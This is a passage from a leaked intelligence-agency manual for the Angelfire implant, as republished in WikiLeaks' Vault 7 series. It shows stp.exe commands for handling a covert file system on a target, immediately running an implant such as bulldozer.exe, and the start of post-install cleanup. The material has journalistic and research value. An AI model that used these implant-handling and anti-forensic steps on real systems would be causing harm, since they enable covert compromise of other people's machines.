Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//20341105
3.9.6 (S) Deleting an executable from the covert file system (-x)
(S) To delete an executable from the covert file system, use the -x option. The file name
specified must match the file name in the covert file system exactly. Note, that to delete
an executable, you might also have to delete its command line file (see the -f option).
Example of deleting a file from the covert file system.
stp.exe -x 001xserver.exe
3.10 (S) ListingThe Contents Of The Covert File System (-l)
(S) To list the names of all files in the covert file system, use the -l option.
stp.exe –l
3.11 (S) Getting a File From The Covert File System (-g)
(S) To get a file from the covert file system, use the -g option. Note that this will write
the file to the target's local file system. This might not be desirable depending on the
contents of the file.
Parameters for using the -g option:
stp.exe –g <file to get> <full destination path to
file>
3.12 (S) Executing binaries on an existing install without reboot
(-k)
(S) If Angelfire is already installed and running on a system, you may use the –k option
to execute a binary immediately. The implant or driver must either be already in the
covert store or added using the
–f option. The file name specified in the –k option is case
sensitive. The Angelfire driver polls periodically for new files to execute, so it might take
a few seconds for the implant to execute after doing a –k. Only one –k execution can be
done at a time. The previous one must finish before stp.exe allows another one to occur.
To determine if there is an outstanding execution, do a file listing and look for the file
_drop. Here is an example of a sequence of commands that would add bulldozer.exe to
the covert store and then immediately execute it:
stp.exe –f bulldozer.exe –c –a 10.3.2.50 –p 1999
stp.exe –k bulldozer.exe
4. (U) Operational Notes
4.1 (S) Post install cleanup
(S) After installation, uninstallation, update, or any covert file system activity, all
Angelfire related files may be deleted with the exception of the container file that was
created as part of the installation process. Additionally, any driver implant or user
af+mainrepo+wolfcreek+Docs+Angelfire_UserGuide
13 of 21
SECRET//20341105

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh